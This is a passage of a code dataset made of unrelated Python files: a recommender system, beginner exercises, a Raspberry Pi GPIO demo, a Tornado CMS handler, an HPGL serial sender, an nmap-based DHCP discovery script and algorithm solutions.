in format 'user_id\\tvideo_id\\tweight'.\nIf only --input provided it is used both for model fit and recommendations;\nuse --rec_input to provide a separate dataset for recommendations\n\"\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--rec_count\", type=int, default=300,\n dest=\"rec_count\", help=\"num of recommendations to generate\")\n parser.add_argument(\"--limit\", type=int, default=0,\n dest=\"limit\", help=\"limit num of users to generate recommendations for\")\n parser.add_argument(\"--input\", type=str, default=\"dataset.tsv\",\n dest=\"inputfile\", help=\"input file name\")\n parser.add_argument(\"--rec_input\", type=str, default=\"\",\n dest=\"rec_inputfile\", help=\"separate input file name for recommendations\")\n parser.add_argument(\"--output\", type=str, default=\"results.csv\",\n dest=\"outputfile\", help=\"output file name\")\n parser.add_argument(\"--gpu\", action=\"store_true\", help=\"use GPU (CUDA)\")\n parser.add_argument(\"--evaluate\", action=\"store_true\",\n help=\"evaluate (cross-validate) model after training\")\n parser.add_argument(\"--model\", type=str, default=\"als\",\n dest=\"model\", help=\"model to calculate (%s)\" % \"/\".join(MODELS.keys()))\n parser.add_argument(\"--log\", type=str, default=\"DEBUG\",\n dest=\"log\", help=\"logging level: CRITICAL|ERROR|WARNING|INFO|DEBUG\")\n args = parser.parse_args()\n\n # setup logging\n logging.basicConfig(level=args.log)\n\n # setup model\n model = get_model(args.model, args.gpu)\n\n # read dataset\n users, videos, weight_coo = read_dataset(args.inputfile)\n\n # prepare\n model, weight_coo = prepare(model, weight_coo)\n\n # if evaluation flag is set\n if args.evaluate:\n # need to split the dataset into (train, test) parts for cross-validation\n train_coo, test_coo = train_test_split(\n weight_coo, train_percentage=0.8)\n # convert test matrix to CSR\n test_csr = test_coo.tocsr()\n else:\n # otherwise use the whole `inputfile` dataset for training\n train_coo = weight_coo\n\n # convert train matrix to CSR\n train_csr = train_coo.tocsr()\n\n # train\n trained_model = train(model, train_csr)\n\n # evaluate\n if args.evaluate:\n evaluate(trained_model, train_csr, test_csr)\n\n # read the dataset for recommendations if it's different from the training one\n if args.rec_inputfile is not \"\" and args.rec_inputfile is not args.inputfile:\n users, videos, weight_coo = read_dataset(args.rec_inputfile)\n # prepare matrix\n model, weight_coo = prepare(model, weight_coo)\n\n # recommend\n calculate_recommendations(trained_model,\n users, videos, weight_coo.tocsr(), args.outputfile, args.rec_count, limit=args.limit)\n\n logging.info(\"Recommendations are written to '%s'\", args.outputfile)\n\n\ndef get_model(model_name, use_gpu=False):\n model_class = MODELS.get(model_name)\n if not model_class:\n raise ValueError(\"Unknown Model '%s'\" % model_name)\n\n # some default params as suggested by the author of Implicit\n if issubclass(model_class, AlternatingLeastSquares):\n params = {\"iterations\": 15, \"factors\": 32,\n \"dtype\": np.float32, \"use_gpu\": use_gpu}\n elif model_name == \"bm25\":\n params = {\"K1\": 100, \"B\": 0.5}\n elif model_name == \"bpr\":\n params = {\"factors\": 63, \"use_gpu\": use_gpu}\n elif model_name == \"lmf\":\n params = {\"factors\": 30, \"iterations\": 40, \"regularization\": 1.5}\n else:\n params = {}\n\n if issubclass(model_class, NMSLibAlternatingLeastSquares):\n # `post: 2` might be a nice way to potentially decrease evaluating / recommending time\n # while increasing index-building time (needs research)\n params[\"index_params\"] = {'M': 8, 'post': 0,\n 'efConstruction': 600}\n params[\"query_params\"] = {'ef': 300}\n\n return model_class(**params)\n\n\ndef read_dataset(filename):\n \"\"\" Reads the original dataset TSV as a pandas dataframe \"\"\"\n\n # read in triples of user_id/video_id/weight from the input dataset\n logging.info(\"Reading dataset '%s'...\", filename)\n start = time.time()\n data = pandas.read_table(filename,\n usecols=[0, 1, 2],\n names=[\"user\", \"video\", \"weight\"],\n na_filter=False)\n\n # map each video and user to a unique numeric value\n data[\"user\"] = data[\"user\"].astype(\"category\")\n data[\"video\"] = data[\"video\"].astype(\"category\")\n\n # create a sparse CSR matrix\n weight = coo_matrix((data[\"weight\"].astype(np.float32),\n (data[\"video\"].cat.codes.copy(),\n data[\"user\"].cat.codes.copy())))\n\n logging.debug(\"Read data file in %0.2fs\", time.time() - start)\n\n return np.array(data[\"user\"].cat.categories), np.array(data[\"video\"].cat.categories.astype(np.str)), weight\n\n\ndef train(model, weight_csr):\n \"\"\" Trains the model \"\"\"\n\n logging.debug(\"Training model %s\", model.__class__)\n start = time.time()\n model.fit(weight_csr)\n logging.debug(\"Trained model in %0.2fs\", time.time() - start)\n\n return model\n\n\ndef evaluate(trained_model, train_csr, test_csr):\n \"\"\" Evaluates the model \"\"\"\n\n logging.debug(\"Evaluating model...\")\n start = time.time()\n\n m = ranking_metrics_at_k(trained_model, train_csr.T.tocsr(),\n test_csr.T.tocsr(), K=1000, num_threads=0)\n logging.debug(\"Evaluated in in %0.2fs\", time.time() - start)\n logging.info(\"Evaluation metrics: %s\", m)\n\n\ndef calculate_recommendations(model, users, videos, weight_csr, output_filename, recs_count=10, limit=0):\n \"\"\" Generates video recommendations for each user in the dataset \"\"\"\n\n max_users = limit if limit > 0 else len(users)\n\n logging.info(\"Building recommendations for %s users with model of '%s'...\",\n max_users, model.__class__)\n start = time.time()\n weight = weight_csr.T.tocsr()\n with tqdm.tqdm(total=max_users) as progress:\n with codecs.open(output_filename, \"w\", \"utf8\") as o:\n c = 0\n for user_idx, user_id in enumerate(users):\n # if limit is set, respect it\n if c >= max_users:\n break\n c += 1\n video_ids = \"\"\n for video_idx, _score in model.recommend(user_idx, weight, N=recs_count):\n video_ids += \" \" + videos[video_idx]\n o.write(\"%s%s\\n\" %\n (user_id, video_ids))\n progress.update(1)\n logging.debug(\"Generated recommendations for %s users in %0.2fs\",\n max_users, time.time() - start)\n\n\ndef prepare(model, weight_coo):\n \"\"\" Prepares a model and a weight matrix in case of ALS \"\"\"\n\n # if we're training an ALS based model, weight input by bm25\n if issubclass(model.__class__, AlternatingLeastSquares):\n # Disable building approximate recommend index\n model.approximate_similar_items = False\n\n # Avoding bm25_weight seems to result in a better AUC, so comment block below for now\n # logging.debug(\"Weighting matrix by bm25_weight\")\n # weight_coo = bm25_weight(weight_coo, K1=100, B=0.8)\n\n return model, weight_coo\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":8802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169258080","text":"def main():\n # escribe tu código abajo de esta línea\n\n jnuevos = int(input(\"Dame la cantidad de juegos nuevos \"))\n jusados = int(input(\"Dame la cantidad de juegos usados \"))\n\n totaljnuevos = jnuevos * 1000\n totaljusados = jusados * 350\n\n totalcompra= totaljnuevos + totaljusados\n\n print(\"El total de precio es\", totalcompra)\n\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/10Videojuego/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602331749","text":"\n\n#calss header\nclass _COMMUNICATIVE():\n\tdef __init__(self,): \n\t\tself.name = \"COMMUNICATIVE\"\n\t\tself.definitions = [u'willing to talk to people and give them information: ', u'relating to communication: ', u'relating to a style of language teaching in which interaction (= talking and responding) is seen as the most important method of learning, and the main aim of learning: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_communicative.py","file_name":"_communicative.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389691434","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(2, GPIO.OUT)\n\ncontin = True\n\nwhile contin:\n val = str(input('Enter a letter: '))\n if val == 'A':\n print('HIGH')\n #GPIO.output(2, GPIO.HIGH)\n elif val == 'B':\n print('LOW')\n #GPIO.output(2, GPIO.LOW)\n elif val == 'Z':\n contin = False\n","sub_path":"Python/RPi.GPIO/exampleGPIO.py","file_name":"exampleGPIO.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422819694","text":"'''\n cms : content manager system\n manager group\n manager account\n manager message\n'''\nfrom __future__ import absolute_import, division, print_function, with_statement\n\n# Tornado framework\nimport tornado.web\nHTTPError = tornado.web.HTTPError\nfrom tornado.log import access_log, gen_log, app_log\n\nfrom handler.base import BaseHandler\n\nfrom common import util\n_now = util.now\n\nfrom config import settings\n\nfrom worker import msg\nfrom worker import manager\n\nimport os\nimport datetime\nimport collections\n\nfrom config import ueditor\n\n# json_encoder = util.json_encoder\njson_encoder = util.json_encoder\njson_decoder = util.json_decoder\n\nclass MainHandler(BaseHandler):\n '''\n '''\n def get(self):\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n if user:\n token = self.get_argument('token')\n token, expired = token.split('|')\n token2 = util.token2(user, expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n self.render('index.html', groups=manager.check_location(user))\n else:\n self.redirect('login.html')\n\nclass PageHandler(BaseHandler):\n '''\n '''\n def get(self, page):\n '''\n Render html page\n '''\n page = page.lower()\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n if user:\n # manager get it's messages\n token = self.get_argument('token')\n token, expired = token.split('|')\n token2 = util.token2(user, expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n \n group = manager.check_location(user)\n\n gmtypes = msg.get_gmtypes(group)\n self.render(page, groups=group, gmtypes=gmtypes)\n else:\n return self.render(page)\n\nclass AuthTokenHandler(BaseHandler):\n def check_token(self):\n user = self.get_argument('manager', '') or self.get_argument('user')\n if not user:\n raise HTTPError(400, reason='Missing manager argument')\n token = self.get_argument('token')\n\n manager.check_token(user, token)\n\n\nclass GMTypeHandler(AuthTokenHandler):\n def get(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n group = manager.check_location(user)\n if _id:\n gmtype = msg.get_gmtype(group, _id)\n gmtypes = [gmtype, ]\n else:\n gmtypes = msg.get_gmtypes(group)\n\n self.render_json_response(gmtypes=gmtypes, **self.OK)\n\n def post(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n group = manager.check_location(user)\n name = self.get_argument('name')\n msg.create_gmtype(group, name)\n self.render_json_response(**self.OK)\n\n def put(self, _id=''):\n if not _id:\n raise HTTPError(400)\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n group = manager.check_location(user)\n name = self.get_argument('name')\n msg.update_gmtype(_id, group, name)\n self.render_json_response(**self.OK)\n\n def delete(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n group = manager.check_location(user)\n msg.delete_gmtype(group, _id)\n self.render_json_response(**self.OK)\n\nclass AccountHandler(BaseHandler):\n '''\n manager account login\n '''\n def post(self):\n '''\n manager login\n '''\n user = self.get_argument('manager', '') or self.get_argument('user')\n if not user:\n raise HTTPError(400, reason='Missing manager argument')\n # password has been encrypted by md5\n password = self.get_argument('password')\n\n _user = manager.get_manager(user, password)\n if not _user:\n raise HTTPError(404, reason='can\\'t found account')\n\n token = util.token(user)\n\n _user.pop('possword', '')\n\n self.render_json_response(User=_user['name'], token=token, **self.OK)\n access_log.info('{} login successfully'.format(_user['name']))\n\n# **************************************************\n#\n# Message handler\n#\n# **************************************************\nclass MessageHandler(AuthTokenHandler):\n '''\n maintain message\n message type: \n news\n notices (use subtitle)\n push to app notices (use subtitle)\n recruit\n '''\n def render_messages(self, **kwargs):\n '''\n Encode dict and return response to client\n '''\n self.set_header('Access-Control-Allow-Origin', '*')\n # origin = self.request.headers.get('Origin', '')\n # # if origin and origin in settings['sites']:\n # if origin:\n # self.set_header('Access-Control-Allow-Origin', origin)\n callback = self.get_argument('callback', None)\n # check should return jsonp\n if callback:\n self.set_status(200, kwargs.get('Msg', None))\n self.finish('{}({})'.format(callback, json_encoder(kwargs)))\n else:\n self.set_status(kwargs['Code'], kwargs.get('Msg', None))\n # self.set_header('Content-Type', 'application/json')\n self.set_header('Content-Type', 'application/json;charset=utf-8')\n self.finish(json_encoder(kwargs))\n\n def render_message_response(self, message):\n '''\n return html|json based on the Accept contents\n '''\n accept = self.request.headers.get('Accept', 'text/html')\n if accept.startswith('application/json'):\n self.render_json_response(Code=200, Msg='OK', **message)\n else:\n if self.is_mobile:\n self.render('news.html', message=message)\n else:\n self.render('message.tmpt', message=message)\n\n def get(self, _id=''):\n '''\n get message\n '''\n # logger.info('id: {}, {}'.format(_id, self.request))\n if _id:\n message = msg.get_message(_id)\n if not message:\n raise HTTPError(404, reason='Can\\'t found message')\n return self.render_message_response(message)\n\n # get messages \n user = self.get_argument('manager', '') or self.get_argument('user', '')\n groups, ismanager = 0, False\n if user:\n # manager get it's messages\n token = self.get_argument('token')\n token, expired = token.split('|')\n token2 = util.token2(user, expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n groups = manager.check_location(user)\n ismanager = True\n else:\n # user get messages\n groups = self.get_argument('groups')\n label = self.get_argument('label', '')\n page = int(self.get_argument('page', 0))\n nums = int(self.get_argument('per', 10))\n mask = int(self.get_argument('mask', 0))\n gmtype = int(self.get_argument('gmtype', 0))\n isimg = int(self.get_argument('isimg', 0))\n expired = int(self.get_argument('expired', 0))\n ap_groups = self.get_argument('ap_groups', '')\n pos = page*nums\n\n messages = msg.get_messages(groups, mask, isimg, gmtype, label, expired, pos, nums, ismanager, ap_groups=ap_groups)\n # logger.info('messages: {}'.format(messages[0]['image']))\n isEnd = 1 if len(messages) < nums else 0\n\n # self.render_json_response(Code=200, Msg='OK', messages=messages, end=isEnd)\n self.render_messages(Code=200, Msg='OK', messages=messages, end=isEnd)\n\n def post(self, _id=''):\n '''\n create new message record\n title subtitle section mask author groups status ctime content image\n labels : labes are separate by ' '\n\n # add ap_groups field, if existed, create message to the special groups\n '''\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs['author'] = user\n kwargs.pop('token')\n kwargs.pop('manager')\n kwargs['groups'] = manager.check_location(user)\n\n if 'ap_groups' in kwargs:\n # split groups to list\n ap_groups = self.get_argument('ap_groups', '')\n kwargs['ap_groups'] = ap_groups.split(',')\n \n msg.create_message(**kwargs)\n self.render_json_response(**self.OK)\n\n def put(self, _id):\n '''\n update message record\n '''\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager')\n\n msg.update_message(_id, **kwargs)\n self.render_json_response(**self.OK)\n\n def delete(self, _id):\n self.check_token()\n msg.delete_message(_id)\n self.render_json_response(**self.OK)\n\nclass UeditorHandler(BaseHandler):\n '''\n support for ueditor upload images\n '''\n def get(self):\n self.set_header('Content-Type', 'application/json')\n self.finish(json_encoder(ueditor.config))\n\n def post(self):\n file_metas = self.request.files['upfile']\n\n filename, ext = '', '' \n for meta in file_metas:\n filename = meta['filename']\n content_type = meta['content_type']\n now = _now()\n mask = util.generate_password(8)\n md5 = util.md5(filename, content_type, now, mask)\n _id = md5.hexdigest().lower()\n\n msg.create_file(meta['body'], _id=_id, filename=filename, content_type=content_type)\n break\n if filename and _id:\n self.render_json_response(url='/fs/'+_id, title=filename, type=content_type, \n state='SUCCESS', **self.OK)\n else:\n raise HTTPError(400)\n\n# @tornado.web.stream_request_body\nclass ImageHandler(BaseHandler):\n '''\n 1. user upload image & update databse\n '''\n # def initialize(self):\n # self.bytes_read = 0\n\n # def data_received(self, data):\n # self.bytes_read += len(data)\n\n def _gen_image_id_(self, *args):\n now = util.now()\n\n return util.md5(now, *args).hexdigest()\n\n def get(self, _id):\n _id = _id.split('.')[0]\n gridout = msg.get_file(_id)\n self.set_header('Content_Type', gridout.content_type)\n self.finish(gridout.read())\n\n def post(self, _id=None):\n '''\n engineer uplaod image\n update engineer's image\n '''\n file_metas = self.request.files['uploadImg']\n filename, ext = _id, ''\n for meta in file_metas:\n filename = meta['filename']\n content_type = meta['content_type']\n \n if not _id:\n _id = self._gen_image_id_(filename, content_type, util.generate_password(8)) \n else:\n # previous data has been existed, delete previous first\n msg.delete_file(_id)\n\n msg.create_file(meta['body'], _id=_id, filename=filename, content_type=content_type)\n break\n\n if filename:\n self.render_json_response(url='/fs/'+_id, **self.OK)\n else:\n raise HTTPError(400)\n \n\n# Jobs handler\nclass JobsHandler(AuthTokenHandler):\n '''\n '''\n JOBS = ['' ,b'']\n\n @classmethod\n def get_jobs(cls, groups):\n '''\n delete yesterday's data\n cache today's data\n # cached 1 hours \n '''\n now = _now('%Y-%d-%m %H')\n if now != cls.JOBS[0]:\n # update data & date\n sociology, school = msg.get_jobs(groups)\n types = msg.get_jobs_types() \n recurt = msg.get_recrut_types()\n address = msg.get_jobs_address()\n \n _01 = msg.get_message(groups+'-01')\n _02 = msg.get_message(groups+'-02')\n\n cls.JOBS[1] = json_encoder({'job_type':types, 'job_address':address, 'recrut_type':recurt,\n 'sociology':sociology, 'school':school, groups+'-01':_01, groups+'-02':_02, \n 'Code':200, 'Msg':'OK'})\n\n cls.JOBS[0] = now\n\n return cls.JOBS[1] \n\n def get(self, _id=''):\n '''\n get special & all jobs\n '''\n if _id:\n job = msg.get_job(_id)\n if not job:\n raise HTTPError(404)\n self.render_json_response(Code=200, Msg='OK', **job)\n else:\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n is_cms = False\n if user:\n self.check_token()\n is_cms = True \n groups = manager.check_location(user)\n else:\n groups = self.get_argument('groups')\n\n if is_cms:\n # get_all jobs, not read from cache\n # disable cache\n self.JOBS[0] = ''\n data = self.get_jobs(groups)\n self.set_header('Content-Type', 'application/json;charset=utf-8')\n self.finish(data)\n else:\n data = self.get_jobs(groups)\n seconds = 86400 # 86400 seconds = 1 day\n self.set_header('Expires', datetime.datetime.utcnow()+datetime.timedelta(seconds=seconds))\n self.set_header('Cache-Control', 'max-age='+str(seconds))\n\n self.set_header('Content-Type', 'application/json;charset=utf-8')\n self.finish(data)\n\n \n\n def post(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager', '')\n kwargs.pop('user', '')\n kwargs['groups'] = manager.check_location(user)\n \n msg.create_job(**kwargs)\n self.render_json_response(**self.OK)\n \n def put(self, _id):\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager', '')\n kwargs.pop('user', '')\n\n msg.update_job(_id, **kwargs)\n self.render_json_response(**self.OK)\n\n def delete(self, _id):\n self.check_token()\n\n msg.delete_job(_id)\n self.render_json_response(**self.OK)\n\n# Jobs type handler\nclass JobsTypeHandler(AuthTokenHandler):\n '''\n '''\n @classmethod\n def check_name(cls, name):\n '''\n check name: if already return True, else False\n '''\n types = msg.get_jobs_types() \n return True if name in types.values() else False\n\n\n def get(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n types = msg.get_jobs_types() \n\n self.render_json_response(job_type=types, **self.OK)\n\n def post(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.create_jobs_type(name)\n\n self.render_json_response(**self.OK)\n\n def put(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.update_jobs_type(_id, name)\n\n self.render_json_response(**self.OK)\n\n# Jobs address handler\nclass JobsAddressHandler(AuthTokenHandler):\n '''\n '''\n @classmethod\n def check_name(cls, name):\n '''\n check name: if already return True, else False\n '''\n address = msg.get_jobs_address() \n return True if name in address.values() else False\n\n def get(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n address = msg.get_jobs_address() \n\n self.render_json_response(job_address=address, **self.OK)\n\n def post(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.create_jobs_address(name)\n\n self.render_json_response(**self.OK)\n\n def put(self, _id=''):\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n groups = manager.check_location(user)\n assert groups\n name = self.get_argument('name')\n if not self.check_name(name):\n msg.update_jobs_address(_id, name)\n\n self.render_json_response(**self.OK)\n\n","sub_path":"handler/cms.py","file_name":"cms.py","file_ext":"py","file_size_in_byte":17599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292817395","text":"\"\"\"\n\nAuthors: David Mutchler, Chandan Rupakheti, their colleagues,\n and Eric Tan (CM 2991). March 2013.\n\"\"\" \n\nimport zellegraphics as zg\n\ndef main():\n \"\"\" Calls the TEST functions in this module. \"\"\"\n test_problem3()\n \ndef close_window(window):\n \"\"\"\n Displays a message at the bottom of the given window telling the user\n to click the mouse when done, waits for a mouse click, and then\n closes the window when the user clicks the mouse.\n Precondition: the argument is a zg.GraphWin.\n \"\"\"\n width = window.getWidth()\n height = window.getHeight()\n bottom = zg.Point(width / 2, height - 15)\n text = zg.Text(bottom, 'Click anywhere in here to exit.')\n text.draw(window)\n \n window.getMouse() # Wait for the user to click,\n window.close() # then close the window.\n \ndef test_problem3():\n \"\"\" Tests the problem3 function. \"\"\"\n window1 = zg.GraphWin('Testing Circles!', 750, 750)\n circle1 = zg.Circle(zg.Point(300, 300), 200)\n circle2 = zg.Circle(zg.Point(500, 300), 100)\n circle3 = zg.Circle(zg.Point(300, 200), 20)\n problem3(window1, circle1)\n problem3(window1, circle2)\n close_window(window1)\n window2 = zg.GraphWin('Testing Circles!', 770, 770)\n problem3(window2, circle3)\n close_window(window2)\n \n \ndef problem3(window, circle):\n \"\"\"\n 1. Draws two zg.Circle's on the given zg.GraphWin, as follows:\n \n -- The first zg.Circle is the given zg.Circle.\n \n -- The second zg.Circle is a new zg.Circle whose center is the\n same as the center of the given zg.Circle but whose radius\n is HALF the radius of the given zg.Circle.\n Also, this second zg.Circle has 'blue' as its fill color.\n \n 2. Waits for a mouse-click.\n \n 3. UN-draws both of the zg.Circle's just drawn.\n \n Drawing the circles in the order listed ensures that the\n second one drawn is visible on top of the (larger) first one drawn.\n \n Preconditions: The first argument is a zg.GraphWin, and the second\n argument is a zg.Circle that fits inside the zg.GraphWin.\n \n \"\"\"\n \n circle.draw(window)\n newcircle = zg.Circle((circle.getCenter()), (circle.getRadius()) / 2)\n newcircle.setFill('blue')\n newcircle.draw(window)\n window.getMouse()\n circle.undraw()\n newcircle.undraw()\n \n \n \n#------------------------------------------------------------------------\n# If this module is running at the top level (as opposed to being\n# imported by another module), then call the 'main' function.\n#------------------------------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"drawing-circles.py","file_name":"drawing-circles.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331371395","text":"import argparse\nimport serial\nimport time\nimport os\n\ndef show_progress(pos, total, length=100):\n fill = length * pos // total\n print('\\rProgress: [' + fill * '\\u2592' + (length-fill) * '\\u2591' + '] ' + str(pos) + ' of ' + str(total), end='\\r')\n if pos == total:\n print()\n return 0\n\ndef fileCheck(checkFile=\"/Users/user/Desktop/hpglsender/test.txt\", position=0):\n \n transport_string = []\n \n def charCheck():\n CCC = transport_string[(len(transport_string)-1)]\n if (CCC != \",\" and CCC != \";\"):\n print(\"A\"+transport_string[(len(transport_string)-1)])\n return 1\n elif (CCC == \",\" or CCC == \";\"):\n print(\"B\"+transport_string[(len(transport_string)-1)])\n return 0\n elif (CCC == '\\0'):\n print(\"C\"+transport_string[(len(transport_string)-1)])\n return 2\n else:\n print(\"F\"+transport_string[(len(transport_string)-1)])\n return None\n \n def byteRead(readFile, readPos):\n readFile.seek(readPos)\n return readFile.read(1)\n \n \n distIntoFile = position\n checkFile = open(checkFile, \"r\")\n transport_string = byteRead(checkFile, distIntoFile)\n print(\"yo\", transport_string)\n distIntoFile += 1 #idk why but this makes it work\n charOK = 0\n \n while charOK == 0:\n CDC = charCheck()\n print(\"hecc \", transport_string)\n if (CDC == 0):\n charOK = 1\n #time.sleep(sleepTime)\n pauseBit = 1\n print(\"cc0\")\n print(\"dist \", distIntoFile)\n elif (CDC == 2):\n charOK = 1\n pauseBit = 0\n print(\"cc1\")\n #break or whatev\n elif (CDC == 1):\n charOK = 0\n pauseBit = 0\n print(\"cc2\")\n transport_string += byteRead(checkFile, distIntoFile)\n distIntoFile += 1\n print(\"dist \", distIntoFile)\n \n checkFile.close()\n returnDataStruct = namedtuple('returnDataStruct', 'int_Dist, str_Data, bool_Pause')\n returnData = returnDataStruct(distIntoFile, transport_string, pauseBit)\n \n return returnData;\n \n \n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('port', default='/dev/tty.usbserial',\n help='serial port location, def: /dev/tty.usbserial')\n parser.add_argument('file', help='/path/to/file.hpgl')\n parser.add_argument('--sleeptime', default=5,\n help='seconds to wait for plotter to clear buffer, def:5')\n args = parser.parse_args()\n \n serial = Serial(port=args.port, timeout=0) #open port\n \n fileSize = os.path.getsize(args.file)\n distanceIntoFile = 0\n \n while distanceIntoFile < fileSize:\n dataTuple = fileCheck(args.file, pos_)\n distanceIntoFile = dataTuple.int_Dist\n dataPacket = dataTuple.str_Data\n doPause = dataTuple.bool_Pause\n if doPause == 1:\n #actually send serial line the dataPacket\n serial.write(dataPacket)\n time.sleep(args.sleeptime)\n \n \n #hpgl = read_hpgl(args.file)\n pos = 0","sub_path":"hpgl serial interface/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200574046","text":"#!/usr/bin/python3.5\nimport subprocess\nimport re\ndef run(repe):\n dhcpList=[]\n OneDHCP=[]\n parsedDHCP=[]\n for i in range(0, repe):\n output = subprocess.check_output([\"nmap\", \"--script=broadcast-dhcp-discover\"])\n for c in range(0, 14):\n if c != 0 and c != 1 and c != 2 and c!=3 and c!= 4 and c!=6 and c!= 13 and c!=14 and len(str(output).split(\"\\\\n\")) >= 10:\n helpme = (str(output).split(\"\\\\n\")[c].split(\":\")[1].strip())\n OneDHCP.append(helpme)\n elif len(str(output).split(\"\\\\n\")) <= 10:\n helpme = None\n OneDHCP.append(helpme)\n parsedDHCP.append(OneDHCP[1]) #0\n try:\n domainname = subprocess.check_output(['nslookup', OneDHCP[1]]) #1\n domainname = str(domainname).split(\".\\\\n\")[0].split(\"=\")[1]\n except Exception:\n parsedDHCP.append(None)\n else:\n parsedDHCP.append(domainname)\n parsedDHCP.append(None) #2\n parsedDHCP.append(None) #3\n parsedDHCP.append(OneDHCP[2]) #4\n parsedDHCP.append(OneDHCP[0]) #5\n parsedDHCP.append(OneDHCP[3]) #6\n parsedDHCP.append(OneDHCP[4]) #7\n parsedDHCP.append(OneDHCP[6]) #8\n parsedDHCP.append(None) #9\n\n dhcpList.append(parsedDHCP)\n OneDHCP=[]\n parsedDHCP=[]\n returnarray = []\n inreturn = [\"dummy\"]\n\n for j in range(len(dhcpList)):\n if dhcpList[j][0] == None:\n x = 0\n elif dhcpList[j][0] in str(inreturn):\n x = 0\n else:\n returnarray.append(dhcpList[j])\n inreturn.append(dhcpList[j][0])\n return returnarray\n","sub_path":"Network_Snapshot_Appliance/Datenbeschaffung/dhcp_discovery.py","file_name":"dhcp_discovery.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19849656","text":"# -*- coding:utf-8 -*-\n#method1\nclass Solution:\n # 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]\n # 函数返回True/False\n def duplicate(self, numbers, duplication):\n # write code here\n hashmap={}\n for each in numbers:\n hashmap[each]=hashmap.get(each,0)+1\n counter = 0\n for element in numbers:\n if hashmap[element]>1:\n duplication[0] = element\n counter+=1\n break\n return counter>=1 \n\n\n#method2: 85.7%通过 ;解法二:高赞回答里的“高级方法” 前排说一下,这种方法并不能够输出“第一个重复的数字”,举例:[3,2,1,1,3],第一个重复的数字是3,但是输出是1\n# -*- coding:utf-8 -*-\nclass Solution:\n # 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]\n # 函数返回True/False\n def duplicate(self, numbers, duplication):\n index = 0\n while index < len(numbers):\n if numbers[index] == index:\n index += 1\n elif numbers[index] == numbers[numbers[index]]:\n duplication[0] = numbers[index]\n return True\n else:\n index_2 = numbers[index]\n numbers[index],numbers[index_2] = numbers[index_2],numbers[index]\n return False","sub_path":"jianzhi_offer/50.py","file_name":"50.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232388457","text":"#-------------------------------------------------------------------------------\r\n# Name: Weather Application by BoredProgrammers\r\n# Purpose: Open Source\r\n#\r\n# Author: BoredProgrammers\r\n#\r\n# Created: 26/12/2019\r\n# Copyright: (c) BoredProgrammers 2019\r\n# Website: www.boredprogrammers.com\r\n#-------------------------------------------------------------------------------\r\nimport requests as 